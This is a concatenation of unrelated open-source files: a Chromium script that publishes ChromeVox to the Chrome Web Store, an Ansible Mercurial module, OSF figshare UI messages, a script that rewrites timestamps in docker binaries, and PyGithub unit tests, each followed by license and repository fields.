matches = re.findall(r'<img([^<]+)>', content)
for match in matches:
match_src = re.search(r'src="([^"]+)', match)
if match_src:
return match_src.group(1)
return None
class TabularData:
def __init__(self):
self._widths = []
self._columns = []
self._rows = []
def set_columns(self, columns):
self._columns = columns
self._widths = [len(c) + 2 for c in columns]
def add_row(self, row):
rows = [str(r) for r in row]
self._rows.append(rows)
for index, element in enumerate(rows):
width = len(element) + 2
if width > self._widths[index]:
self._widths[index] = width
def add_rows(self, rows):
for row in rows:
self.add_row(row)
def render(self):
"""Renders a table in rST format.
Example:
+-------+-----+
| Name | Age |
+-------+-----+
| Alice | 24 |
| Bob | 19 |
+-------+-----+
"""
sep = '+'.join('-' * w for w in self._widths)
sep = f'+{sep}+'
to_draw = [sep]
def get_entry(d):
elem = '|'.join(f'{e:^{self._widths[i]}}' for i, e in enumerate(d))
return f'|{elem}|'
to_draw.append(get_entry(self._columns))
to_draw.append(sep)
for row in self._rows:
to_draw.append(get_entry(row))
to_draw.append(sep)
return '\n'.join(to_draw)
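# Quick usage sketch (illustrative values):
#     table = TabularData()
#     table.set_columns(['Name', 'Level'])
#     table.add_rows([['Galarzaa', 285], ['Nezune', 412]])
#     print(table.render())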
| apache-2.0 |
dushu1203/chromium.src | chrome/browser/resources/chromeos/chromevox/tools/chromevox_webstore_util.py | 10 | 4789 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''A set of utilities to interface with the Chrome Webstore API.'''
import SimpleHTTPServer
import SocketServer
import httplib
import json
import os
import re
import sys
import thread
import urllib
import webbrowser
PROJECT_ARGS = {
'client_id': ('937534751394-gbj5334v9144c57qjqghl7d283plj5r4'
'.apps.googleusercontent.com'),
'grant_type': 'authorization_code',
'redirect_uri': 'http://localhost:8000'
}
PORT = 8000
APP_ID = 'kgejglhpjiefppelpmljglcjbhoiplfn'
OAUTH_DOMAIN = 'accounts.google.com'
OAUTH_AUTH_COMMAND = '/o/oauth2/auth'
OAUTH_TOKEN_COMMAND = '/o/oauth2/token'
WEBSTORE_API_SCOPE = 'https://www.googleapis.com/auth/chromewebstore'
API_ENDPOINT_DOMAIN = 'www.googleapis.com'
COMMAND_GET_UPLOAD_STATUS = (
'/chromewebstore/v1.1/items/%s?projection=draft' % APP_ID)
COMMAND_POST_PUBLISH = '/chromewebstore/v1.1/items/%s/publish' % APP_ID
COMMAND_POST_UPLOAD = '/upload/chromewebstore/v1.1/items/%s' % APP_ID
class CodeRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
content = self.rfile.readline()
self.server.code = re.search('code=(.*) ', content).groups()[0]
self.rfile.close()
def GetAuthCode():
Handler = CodeRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
query = '&'.join(['response_type=code',
'scope=%s' % WEBSTORE_API_SCOPE,
'client_id=%(client_id)s' % PROJECT_ARGS,
'redirect_uri=%(redirect_uri)s' % PROJECT_ARGS])
auth_url = 'https://%s%s?%s' % (OAUTH_DOMAIN, OAUTH_AUTH_COMMAND, query)
print 'Navigating to %s' % auth_url
webbrowser.open(auth_url)
httpd.handle_request()
httpd.server_close()
return httpd.code
def GetOauthToken(code, client_secret):
PROJECT_ARGS['code'] = code
PROJECT_ARGS['client_secret'] = client_secret
body = urllib.urlencode(PROJECT_ARGS)
conn = httplib.HTTPSConnection(OAUTH_DOMAIN)
conn.putrequest('POST', OAUTH_TOKEN_COMMAND)
conn.putheader('content-type', 'application/x-www-form-urlencoded')
conn.putheader('content-length', len(body))
conn.endheaders()
conn.send(body)
content = conn.getresponse().read()
return json.loads(content)
def GetPopulatedHeader(client_secret):
code = GetAuthCode()
access_token = GetOauthToken(code, client_secret)
url = 'www.googleapis.com'
return {'Authorization': 'Bearer %(access_token)s' % access_token,
'x-goog-api-version': 2,
'Content-Length': 0
}
def SendGetCommand(command, client_secret):
headers = GetPopulatedHeader(client_secret)
conn = httplib.HTTPSConnection(API_ENDPOINT_DOMAIN)
conn.request('GET', command, '', headers)
return conn.getresponse()
def SendPostCommand(command, client_secret, header_additions = {}, body=None):
headers = GetPopulatedHeader(client_secret)
headers = dict(headers.items() + header_additions.items())
conn = httplib.HTTPSConnection(API_ENDPOINT_DOMAIN)
conn.request('POST', command, body, headers)
return conn.getresponse()
def GetUploadStatus(client_secret):
'''Gets the status of a previous upload.
Args:
client_secret ChromeVox's client secret creds.
'''
return SendGetCommand(COMMAND_GET_UPLOAD_STATUS, client_secret)
# httplib fails to persist the connection during upload; use curl instead.
def PostUpload(file, client_secret):
'''Posts an uploaded version of ChromeVox.
Args:
file A string path to the ChromeVox extension zip.
client_secret ChromeVox's client secret creds.
'''
header = GetPopulatedHeader(client_secret)
curl_command = ' '.join(['curl',
'-H "Authorization: %(Authorization)s"' % header,
'-H "x-goog-api-version: 2"',
'-X PUT',
'-T %s' % file,
'-v',
'https://%s%s' % (API_ENDPOINT_DOMAIN,
COMMAND_POST_UPLOAD)])
print 'Running %s' % curl_command
if os.system(curl_command) != 0:
sys.exit(-1)
def PostPublishTrustedTesters(client_secret):
'''Publishes a previously uploaded ChromeVox extension to trusted testers.
Args:
client_secret ChromeVox's client secret creds.
'''
return SendPostCommand(COMMAND_POST_PUBLISH,
client_secret,
{ 'publishTarget': 'trustedTesters'})
def PostPublish(client_secret):
'''Publishes a previously uploaded ChromeVox extension publicly.
Args:
client_secret ChromeVox's client secret creds.
'''
return SendPostCommand(COMMAND_POST_PUBLISH, client_secret)
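# Typical flow (illustrative only; the real release scripts that drive these
# helpers live elsewhere, and the secret source below is hypothetical):
#     client_secret = open('client_secret.txt').read().strip()
#     PostUpload('chromevox.zip', client_secret)
#     print(GetUploadStatus(client_secret).read())
#     PostPublishTrustedTesters(client_secret)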
| bsd-3-clause |
drue/ansible-modules-core | source_control/hg.py | 3 | 8624 | #!/usr/bin/python
#-*- coding: utf-8 -*-
# (c) 2013, Yeukhon Wong <[email protected]>
# (c) 2014, Nate Coraor <[email protected]>
#
# This module was originally inspired by Brad Olson's ansible-module-mercurial
# <https://github.com/bradobro/ansible-module-mercurial>. This module tends
# to follow the git module implementation.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import ConfigParser
DOCUMENTATION = '''
---
module: hg
short_description: Manages Mercurial (hg) repositories.
description:
- Manages Mercurial (hg) repositories. Supports SSH, HTTP/S and local address.
version_added: "1.0"
author: Yeukhon Wong
options:
repo:
description:
- The repository address.
required: true
default: null
aliases: [ name ]
dest:
description:
- Absolute path of where the repository should be cloned to.
required: true
default: null
revision:
description:
- Equivalent C(-r) option in hg command which could be the changeset, revision number,
branch name or even tag.
required: false
default: null
aliases: [ version ]
force:
description:
- Discards uncommitted changes. Runs C(hg update -C).
required: false
default: "yes"
choices: [ "yes", "no" ]
purge:
description:
- Deletes untracked files. Runs C(hg purge).
required: false
default: "no"
choices: [ "yes", "no" ]
executable:
required: false
default: null
version_added: "1.4"
description:
- Path to hg executable to use. If not supplied,
the normal mechanism for resolving binary paths will be used.
notes:
- "If the task seems to be hanging, first verify remote host is in C(known_hosts).
SSH will prompt user to authorize the first contact with a remote host. To avoid this prompt,
one solution is to add the remote host public key in C(/etc/ssh/ssh_known_hosts) before calling
the hg module, with the following command: ssh-keyscan remote_host.com >> /etc/ssh/ssh_known_hosts."
requirements: [ ]
'''
EXAMPLES = '''
# Ensure the current working copy is inside the stable branch and deletes untracked files if any.
- hg: repo=https://bitbucket.org/user/repo1 dest=/home/user/repo1 revision=stable purge=yes
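# Additional illustrative example (not from the original module docs): check out a
# specific tagged revision without purging untracked files.
- hg: repo=ssh://[email protected]/user/repo2 dest=/home/user/repo2 revision=1.4 purge=no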
'''
class Hg(object):
def __init__(self, module, dest, repo, revision, hg_path):
self.module = module
self.dest = dest
self.repo = repo
self.revision = revision
self.hg_path = hg_path
def _command(self, args_list):
(rc, out, err) = self.module.run_command([self.hg_path] + args_list)
return (rc, out, err)
def _list_untracked(self):
args = ['purge', '--config', 'extensions.purge=', '-R', self.dest, '--print']
return self._command(args)
def get_revision(self):
"""
hg id -b -i -t returns a string in the format:
"<changeset>[+] <branch_name> <tag>"
This format lists the state of the current working copy,
and indicates whether there are uncommitted changes by the
plus sign. Otherwise, the sign is omitted.
Read the full description via hg id --help
"""
(rc, out, err) = self._command(['id', '-b', '-i', '-t', '-R', self.dest])
if rc != 0:
self.module.fail_json(msg=err)
else:
return out.strip('\n')
def has_local_mods(self):
now = self.get_revision()
if '+' in now:
return True
else:
return False
def discard(self):
before = self.has_local_mods()
if not before:
return False
args = ['update', '-C', '-R', self.dest]
if self.revision is not None:
args = args + ['-r', self.revision]
(rc, out, err) = self._command(args)
if rc != 0:
self.module.fail_json(msg=err)
after = self.has_local_mods()
if before != after and not after: # no more local modification
return True
def purge(self):
# before purge, find out if there are any untracked files
(rc1, out1, err1) = self._list_untracked()
if rc1 != 0:
self.module.fail_json(msg=err1)
        # there are some untracked files
if out1 != '':
args = ['purge', '--config', 'extensions.purge=', '-R', self.dest]
(rc2, out2, err2) = self._command(args)
if rc2 != 0:
self.module.fail_json(msg=err2)
return True
else:
return False
def cleanup(self, force, purge):
discarded = False
purged = False
if force:
discarded = self.discard()
if purge:
purged = self.purge()
if discarded or purged:
return True
else:
return False
def pull(self):
return self._command(
['pull', '-R', self.dest, self.repo])
def update(self):
if self.revision is not None:
return self._command(['update', '-r', self.revision, '-R', self.dest])
return self._command(['update', '-R', self.dest])
def clone(self):
if self.revision is not None:
return self._command(['clone', self.repo, self.dest, '-r', self.revision])
return self._command(['clone', self.repo, self.dest])
@property
def at_revision(self):
"""
There is no point in pulling from a potentially down/slow remote site
if the desired changeset is already the current changeset.
"""
if self.revision is None or len(self.revision) < 7:
# Assume it's a rev number, tag, or branch
return False
(rc, out, err) = self._command(['--debug', 'id', '-i', '-R', self.dest])
if rc != 0:
self.module.fail_json(msg=err)
if out.startswith(self.revision):
return True
return False
# ===========================================
def main():
module = AnsibleModule(
argument_spec = dict(
repo = dict(required=True, aliases=['name']),
dest = dict(required=True),
revision = dict(default=None, aliases=['version']),
force = dict(default='yes', type='bool'),
purge = dict(default='no', type='bool'),
executable = dict(default=None),
),
)
repo = module.params['repo']
dest = os.path.expanduser(module.params['dest'])
revision = module.params['revision']
force = module.params['force']
purge = module.params['purge']
hg_path = module.params['executable'] or module.get_bin_path('hg', True)
hgrc = os.path.join(dest, '.hg/hgrc')
# initial states
before = ''
changed = False
cleaned = False
hg = Hg(module, dest, repo, revision, hg_path)
# If there is no hgrc file, then assume repo is absent
# and perform clone. Otherwise, perform pull and update.
if not os.path.exists(hgrc):
(rc, out, err) = hg.clone()
if rc != 0:
module.fail_json(msg=err)
elif hg.at_revision:
# no update needed, don't pull
before = hg.get_revision()
# but force and purge if desired
cleaned = hg.cleanup(force, purge)
else:
# get the current state before doing pulling
before = hg.get_revision()
# can perform force and purge
cleaned = hg.cleanup(force, purge)
(rc, out, err) = hg.pull()
if rc != 0:
module.fail_json(msg=err)
(rc, out, err) = hg.update()
if rc != 0:
module.fail_json(msg=err)
after = hg.get_revision()
if before != after or cleaned:
changed = True
module.exit_json(before=before, after=after, changed=changed, cleaned=cleaned)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
asanfilippo7/osf.io | website/addons/figshare/messages.py | 2 | 2990 | # MODEL MESSAGES :model.py
BEFORE_PAGE_LOAD_PRIVATE_NODE_MIXED_FS = 'Warning: This OSF {category} is private but figshare project {project_id} may contain some public files or filesets.'
BEFORE_PAGE_LOAD_PUBLIC_NODE_MIXED_FS = 'Warning: This OSF {category} is public but figshare project {project_id} may contain some private files or filesets.'
BEFORE_PAGE_LOAD_PERM_MISMATCH = 'Warning: This OSF {category} is {node_perm}, but the figshare article {figshare_id} is {figshare_perm}. '
BEFORE_PAGE_LOAD_PUBLIC_NODE_PRIVATE_FS = 'Users can view the contents of this private figshare article. '
BEFORE_REMOVE_CONTRIBUTOR = 'The figshare add-on for this {category} is authenticated by {user}. Removing this user will also remove write access to the {category} unless another contributor re-authenticates. '
BEFORE_FORK_OWNER = 'Because you have authenticated the figshare add-on for this {category}, forking it will also transfer your authorization to the forked {category}. '
BEFORE_FORK_NOT_OWNER = 'Because this figshare add-on has been authenticated by a different user, forking it will not transfer authentication to the forked {category}. '
AFTER_FORK_OWNER = 'figshare authorization copied to forked {category}. '
AFTER_FORK_NOT_OWNER = 'figshare authorization not copied to forked {category}. You may authorize this fork on the <u><a href={url}>Settings</a></u> page. '
BEFORE_REGISTER = 'The contents of figshare projects cannot be registered at this time. The figshare data associated with this {category} will not be included as part of this registration. '
# END MODEL MESSAGES
# MFR MESSAGES :views/crud.py
FIGSHARE_VIEW_FILE_PRIVATE = 'Since this figshare file is unpublished we cannot render it. In order to access this content you will need to log into the <u><a href="{url}">figshare page</a></u> and view it there. '
FIGSHARE_VIEW_FILE_OVERSIZED = 'This figshare file is too large to render; <u><a href="{url}">download file</a></u> to view it. '
'''
Publishing this article is an irreversible operation. Once a figshare article is published it can never be deleted. Proceed with caution.
<br /><br />
Also, figshare requires some additional info before this article can be published: <br />
<form id='figsharePublishForm' action='${nodeApiUrl}figshare/publish/article/${parent_id}/'>
<h3><label>Title:</label></h3>
<input name='title' type='text' value='${figshare_title}'>
<h3><label>Category:</label></h3>
<select name='cat' id='figshareCategory' value='${figshare_category}'>${figshare_categories}</select><br />
<h3><label>Tag(s):</label></h3>
<input name='tags' type='text' value='${figshare_tags}' placeholder='e.g. neuroscience, cognition'><br />
<h3><label>Description</label></h3>
<textarea name='description' placeholder='Please type a description of this file here'>${figshare_desc}</textarea>
</form>
'''
OAUTH_INVALID = 'Your OAuth key for figshare is no longer valid. Please re-authenticate. '
# END MFR MESSAGES
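# Illustrative sketch, not part of the original file: these constants are plain
# str.format() templates, so callers interpolate them before display, e.g.
#
#   BEFORE_PAGE_LOAD_PERM_MISMATCH.format(category='project', node_perm='public',
#                                         figshare_id=12345, figshare_perm='private')
#
# The argument values above are assumptions chosen only to show the call shape.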
| apache-2.0 |
wallace123/docker-time | docker-time.py | 1 | 1649 | """ Searches docker binaries and edits the timestamp """
import os
import sys
import argparse
import re
from datetime import datetime
ONE_GB = 1024*1024*1024
def readFile(infile):
if os.stat(infile).st_size > ONE_GB:
print "File size too big...exiting"
sys.exit(0)
with open(infile, 'r') as f:
f_chars = f.read()
f.close()
return f_chars
def subTimeStamp(instr):
# Docker timestamp example: 2016-12-16T02:42:17.070078439+00:00
    # The regExpr timestamp is shortened because Python's datetime module
    # only goes to 6 places (microseconds) in the fractional-second field
regExpr = r'2016-\d\d-\d\dT\d\d:\d\d:\d\d\.\d\d\d\d\d\d'
searchObj = re.search(regExpr,
instr,
re.M|re.I)
if searchObj:
print "timestamp found: ", searchObj.group()
else:
print "Timestamp not found"
sys.exit(0)
new_timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
outstr = re.sub(regExpr,
new_timestamp,
instr)
return outstr
def writeFile(outstr, outfile):
with open(outfile, 'w') as f:
f.write(outstr)
f.close()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('infile',
help="Input file to search for timestamp")
parser.add_argument('outfile',
help="Output file with modified timestamp")
args = parser.parse_args()
in_chars = readFile(args.infile)
out_chars = subTimeStamp(in_chars)
writeFile(out_chars, args.outfile)
if __name__ == '__main__':
main()
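# Illustrative usage sketch (the file names below are assumptions, not part of
# the original script):
#
#   python docker-time.py /usr/bin/docker docker.patched
#
# This reads the input binary, rewrites the first 2016-era build timestamp it
# finds to the current UTC time, and writes the modified copy to docker.patched.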
| gpl-3.0 |
iModels/ffci | github/tests/AuthenticatedUser.py | 1 | 16898 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <[email protected]> #
# Copyright 2012 Zearin <[email protected]> #
# Copyright 2013 Vincent Jacques <[email protected]> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
from . import Framework
import github
import datetime
class AuthenticatedUser(Framework.TestCase):
def setUp(self):
Framework.TestCase.setUp(self)
self.user = self.g.get_user()
def testAttributes(self):
self.assertEqual(self.user.avatar_url, "https://secure.gravatar.com/avatar/b68de5ae38616c296fa345d2b9df2225?d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png")
self.assertEqual(self.user.bio, "")
self.assertEqual(self.user.blog, "http://vincent-jacques.net")
self.assertEqual(self.user.collaborators, 0)
self.assertEqual(self.user.company, "Criteo")
self.assertEqual(self.user.created_at, datetime.datetime(2010, 7, 9, 6, 10, 6))
self.assertEqual(self.user.disk_usage, 16692)
self.assertEqual(self.user.email, "[email protected]")
self.assertEqual(self.user.followers, 13)
self.assertEqual(self.user.following, 24)
self.assertEqual(self.user.gravatar_id, "b68de5ae38616c296fa345d2b9df2225")
self.assertFalse(self.user.hireable)
self.assertEqual(self.user.html_url, "https://github.com/jacquev6")
self.assertEqual(self.user.id, 327146)
self.assertEqual(self.user.location, "Paris, France")
self.assertEqual(self.user.login, "jacquev6")
self.assertEqual(self.user.name, "Vincent Jacques")
self.assertEqual(self.user.owned_private_repos, 5)
self.assertEqual(self.user.plan.name, "micro")
self.assertEqual(self.user.plan.collaborators, 1)
self.assertEqual(self.user.plan.space, 614400)
self.assertEqual(self.user.plan.private_repos, 5)
self.assertEqual(self.user.private_gists, 5)
self.assertEqual(self.user.public_gists, 1)
self.assertEqual(self.user.public_repos, 10)
self.assertEqual(self.user.total_private_repos, 5)
self.assertEqual(self.user.type, "User")
self.assertEqual(self.user.url, "https://api.github.com/users/jacquev6")
def testEditWithoutArguments(self):
self.user.edit()
def testEditWithAllArguments(self):
self.user.edit("Name edited by PyGithub", "Email edited by PyGithub", "Blog edited by PyGithub", "Company edited by PyGithub", "Location edited by PyGithub", True, "Bio edited by PyGithub")
self.assertEqual(self.user.name, "Name edited by PyGithub")
self.assertEqual(self.user.email, "Email edited by PyGithub")
self.assertEqual(self.user.blog, "Blog edited by PyGithub")
self.assertEqual(self.user.company, "Company edited by PyGithub")
self.assertEqual(self.user.location, "Location edited by PyGithub")
self.assertTrue(self.user.hireable)
self.assertEqual(self.user.bio, "Bio edited by PyGithub")
def testEmails(self):
self.assertEqual(self.user.get_emails(), ["[email protected]", "[email protected]"])
self.user.add_to_emails("[email protected]", "[email protected]")
self.assertEqual(self.user.get_emails(), ["[email protected]", "[email protected]", "[email protected]", "[email protected]"])
self.user.remove_from_emails("[email protected]", "[email protected]")
self.assertEqual(self.user.get_emails(), ["[email protected]", "[email protected]"])
def testFollowing(self):
nvie = self.g.get_user("nvie")
self.assertListKeyEqual(self.user.get_following(), lambda u: u.login, ["schacon", "jamis", "chad", "unclebob", "dabrahams", "jnorthrup", "brugidou", "regisb", "walidk", "tanzilli", "fjardon", "r3c", "sdanzan", "vineus", "cjuniet", "gturri", "ant9000", "asquini", "claudyus", "jardon-u", "s-bernard", "kamaradclimber", "Lyloa", "nvie"])
self.assertTrue(self.user.has_in_following(nvie))
self.user.remove_from_following(nvie)
self.assertFalse(self.user.has_in_following(nvie))
self.user.add_to_following(nvie)
self.assertTrue(self.user.has_in_following(nvie))
self.assertListKeyEqual(self.user.get_followers(), lambda u: u.login, ["jnorthrup", "brugidou", "regisb", "walidk", "afzalkhan", "sdanzan", "vineus", "gturri", "fjardon", "cjuniet", "jardon-u", "kamaradclimber", "L42y"])
def testWatching(self):
gitflow = self.g.get_user("nvie").get_repo("gitflow")
self.assertListKeyEqual(self.user.get_watched(), lambda r: r.name, ["git", "boost.php", "capistrano", "boost.perl", "git-subtree", "git-hg", "homebrew", "celtic_knot", "twisted-intro", "markup", "hub", "gitflow", "murder", "boto", "agit", "d3", "pygit2", "git-pulls", "django_mathlatex", "scrumblr", "developer.github.com", "python-github3", "PlantUML", "bootstrap", "drawnby", "django-socketio", "django-realtime", "playground", "BozoCrack", "FatherBeaver", "PyGithub", "django", "django", "TestPyGithub"])
self.assertTrue(self.user.has_in_watched(gitflow))
self.user.remove_from_watched(gitflow)
self.assertFalse(self.user.has_in_watched(gitflow))
self.user.add_to_watched(gitflow)
self.assertTrue(self.user.has_in_watched(gitflow))
def testStarring(self):
gitflow = self.g.get_user("nvie").get_repo("gitflow")
self.assertListKeyEqual(self.user.get_starred(), lambda r: r.name, ["git", "boost.php", "capistrano", "boost.perl", "git-subtree", "git-hg", "homebrew", "celtic_knot", "twisted-intro", "markup", "hub", "gitflow", "murder", "boto", "agit", "d3", "pygit2", "git-pulls", "django_mathlatex", "scrumblr", "developer.github.com", "python-github3", "PlantUML", "bootstrap", "drawnby", "django-socketio", "django-realtime", "playground", "BozoCrack", "FatherBeaver", "amaunet", "django", "django", "moviePlanning", "folly"])
self.assertTrue(self.user.has_in_starred(gitflow))
self.user.remove_from_starred(gitflow)
self.assertFalse(self.user.has_in_starred(gitflow))
self.user.add_to_starred(gitflow)
self.assertTrue(self.user.has_in_starred(gitflow))
def testSubscriptions(self):
gitflow = self.g.get_user("nvie").get_repo("gitflow")
self.assertListKeyEqual(self.user.get_subscriptions(), lambda r: r.name, ["gitflow", "ViDE", "Boost.HierarchicalEnum", "QuadProgMm", "DrawSyntax", "DrawTurksHead", "PrivateStuff", "vincent-jacques.net", "Hacking", "C4Planner", "developer.github.com", "PyGithub", "PyGithub", "django", "CinePlanning", "PyGithub", "PyGithub", "PyGithub", "IpMap", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub", "PyGithub"])
self.assertTrue(self.user.has_in_subscriptions(gitflow))
self.user.remove_from_subscriptions(gitflow)
self.assertFalse(self.user.has_in_subscriptions(gitflow))
self.user.add_to_subscriptions(gitflow)
self.assertTrue(self.user.has_in_subscriptions(gitflow))
def testGetAuthorizations(self):
self.assertListKeyEqual(self.user.get_authorizations(), lambda a: a.id, [372294])
def testCreateRepository(self):
repo = self.user.create_repo("TestPyGithub")
self.assertEqual(repo.url, "https://api.github.com/repos/jacquev6/TestPyGithub")
def testCreateRepositoryWithAllArguments(self):
repo = self.user.create_repo("TestPyGithub", "Repo created by PyGithub", "http://foobar.com", private=False, has_issues=False, has_wiki=False, has_downloads=False)
self.assertEqual(repo.url, "https://api.github.com/repos/jacquev6/TestPyGithub")
def testCreateRepositoryWithAutoInit(self):
repo = self.user.create_repo("TestPyGithub", auto_init=True, gitignore_template="Python")
self.assertEqual(repo.url, "https://api.github.com/repos/jacquev6/TestPyGithub")
def testCreateAuthorizationWithoutArguments(self):
authorization = self.user.create_authorization()
self.assertEqual(authorization.id, 372259)
def testCreateAuthorizationWithAllArguments(self):
authorization = self.user.create_authorization(["repo"], "Note created by PyGithub", "http://vincent-jacques.net/PyGithub")
self.assertEqual(authorization.id, 372294)
def testCreateAuthorizationWithClientIdAndSecret(self):
# I don't have a client_id and client_secret so the ReplayData for this test is forged
authorization = self.user.create_authorization(client_id="01234567890123456789", client_secret="0123456789012345678901234567890123456789")
self.assertEqual(authorization.id, 372294)
def testCreateGist(self):
gist = self.user.create_gist(True, {"foobar.txt": github.InputFileContent("File created by PyGithub")}, "Gist created by PyGithub")
self.assertEqual(gist.description, "Gist created by PyGithub")
self.assertEqual(list(gist.files.keys()), ["foobar.txt"])
self.assertEqual(gist.files["foobar.txt"].content, "File created by PyGithub")
def testCreateGistWithoutDescription(self):
gist = self.user.create_gist(True, {"foobar.txt": github.InputFileContent("File created by PyGithub")})
self.assertEqual(gist.description, None)
self.assertEqual(list(gist.files.keys()), ["foobar.txt"])
self.assertEqual(gist.files["foobar.txt"].content, "File created by PyGithub")
def testCreateKey(self):
key = self.user.create_key("Key added through PyGithub", "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA2Mm0RjTNAYFfSCtUpO54usdseroUSIYg5KX4JoseTpqyiB/hqewjYLAdUq/tNIQzrkoEJWSyZrQt0ma7/YCyMYuNGd3DU6q6ZAyBeY3E9RyCiKjO3aTL2VKQGFvBVVmGdxGVSCITRphAcsKc/PF35/fg9XP9S0anMXcEFtdfMHz41SSw+XtE+Vc+6cX9FuI5qUfLGbkv8L1v3g4uw9VXlzq4GfTA+1S7D6mcoGHopAIXFlVr+2RfDKdSURMcB22z41fljO1MW4+zUS/4FyUTpL991es5fcwKXYoiE+x06VJeJJ1Krwx+DZj45uweV6cHXt2JwJEI9fWB6WyBlDejWw== vincent@IDEE")
self.assertEqual(key.id, 2626650)
def testGetEvents(self):
self.assertListKeyBegin(self.user.get_events(), lambda e: e.type, ["PushEvent", "IssuesEvent", "IssueCommentEvent", "PushEvent"])
def testGetOrganizationEvents(self):
self.assertListKeyBegin(self.user.get_organization_events(self.g.get_organization("BeaverSoftware")), lambda e: e.type, ["CreateEvent", "CreateEvent", "PushEvent", "PushEvent"])
def testGetGists(self):
self.assertListKeyEqual(self.user.get_gists(), lambda g: g.id, ["2793505", "2793179", "11cb445f8197e17d303d", "1942384", "dcb7de17e8a52b74541d"])
def testGetStarredGists(self):
self.assertListKeyEqual(self.user.get_starred_gists(), lambda g: g.id, ["1942384", "dcb7de17e8a52b74541d"])
def testGetIssues(self):
self.assertListKeyEqual(self.user.get_issues(), lambda i: (i.id, i.repository.name), [(4639931, "PyGithub"), (4452000, "PyGithub"), (4356743, "PyGithub"), (3716033, "PyGithub"), (3715946, "PyGithub"), (3643837, "PyGithub"), (3628022, "PyGithub"), (3624595, "PyGithub"), (3624570, "PyGithub"), (3624561, "PyGithub"), (3624556, "PyGithub"), (3619973, "PyGithub"), (3527266, "PyGithub"), (3527245, "PyGithub"), (3527231, "PyGithub")])
def testGetIssuesWithAllArguments(self):
requestedByUser = self.user.get_repo("PyGithub").get_label("Requested by user")
issues = self.user.get_issues("assigned", "closed", [requestedByUser], "comments", "asc", datetime.datetime(2012, 5, 28, 23, 0, 0))
self.assertListKeyEqual(issues, lambda i: i.id, [6816576, 8495415, 6889934, 8339699, 8075253, 8033963, 9089893, 9489725, 11746141, 5152384, 5177381, 5783131, 6454054, 6641076, 6653907, 7331214, 9489813, 9776615, 10360280, 4356743, 6583381, 6751469, 8189836, 10758585, 12097154, 12867103, 5191621, 5256315, 6363719, 9209408, 6912733, 9948505, 11503771, 10922412, 11844658, 12566144, 6353712, 9323084, 10379143, 5387373, 12179668, 6911794, 11731917, 6807542, 6780606])
def testGetUserIssues(self):
self.assertListKeyEqual(self.user.get_user_issues(), lambda i: i.id, [14447880, 13505356, 12541184, 10586808, 6741461, 6741457, 6727331, 5641572])
def testGetUserIssuesWithAllArguments(self):
requestedByUser = self.user.get_repo("PyGithub").get_label("Requested by user")
issues = self.user.get_user_issues("assigned", "closed", [requestedByUser], "comments", "asc", datetime.datetime(2012, 5, 28, 23, 0, 0))
self.assertListKeyEqual(issues, lambda i: i.id, [6816576, 8495415, 6889934, 8339699, 8075253, 8033963, 9089893, 9489725, 11746141, 5152384, 5177381, 5783131, 6454054, 6641076, 6653907, 7331214, 9489813, 9776615, 10360280, 4356743, 6583381, 6751469, 8189836, 10758585, 12097154, 12867103, 5191621, 5256315, 6363719, 9209408, 6912733, 9948505, 11503771, 10922412, 11844658, 12566144, 6353712, 9323084, 10379143, 5387373, 12179668, 6911794, 11731917, 6807542, 6780606])
def testGetKeys(self):
self.assertListKeyEqual(self.user.get_keys(), lambda k: k.title, ["vincent@home", "vincent@gandi", "vincent@aws", "vincent@macbook"])
def testGetOrgs(self):
self.assertListKeyEqual(self.user.get_orgs(), lambda o: o.login, ["BeaverSoftware"])
def testGetRepos(self):
self.assertListKeyEqual(self.user.get_repos(), lambda r: r.name, ["TestPyGithub", "django", "PyGithub", "developer.github.com", "acme-public-website", "C4Planner", "Hacking", "vincent-jacques.net", "Contests", "Candidates", "Tests", "DrawTurksHead", "DrawSyntax", "QuadProgMm", "Boost.HierarchicalEnum", "ViDE"])
def testGetReposWithArguments(self):
self.assertListKeyEqual(self.user.get_repos("public", "full_name", "desc"), lambda r: r.name, ["ViDE", "QuadProgMm", "PyGithub", "DrawTurksHead", "DrawSyntax", "django", "developer.github.com", "C4Planner", "Boost.HierarchicalEnum", "acme-public-website"])
def testCreateFork(self):
repo = self.user.create_fork(self.g.get_user("nvie").get_repo("gitflow"))
self.assertEqual(repo.source.full_name, "nvie/gitflow")
def testGetNotification(self):
notification = self.user.get_notification("8406712")
self.assertEqual(notification.id, "8406712")
self.assertEqual(notification.unread, False)
self.assertEqual(notification.reason, "author")
self.assertEqual(notification.subject.title, "Feature/coveralls")
self.assertEqual(notification.subject.type, "PullRequest")
self.assertEqual(notification.repository.id, 8432784)
self.assertEqual(notification.updated_at, datetime.datetime(2013, 3, 15, 5, 43, 11))
self.assertEqual(notification.url, None)
self.assertEqual(notification.subject.url, None)
self.assertEqual(notification.subject.latest_comment_url, None)
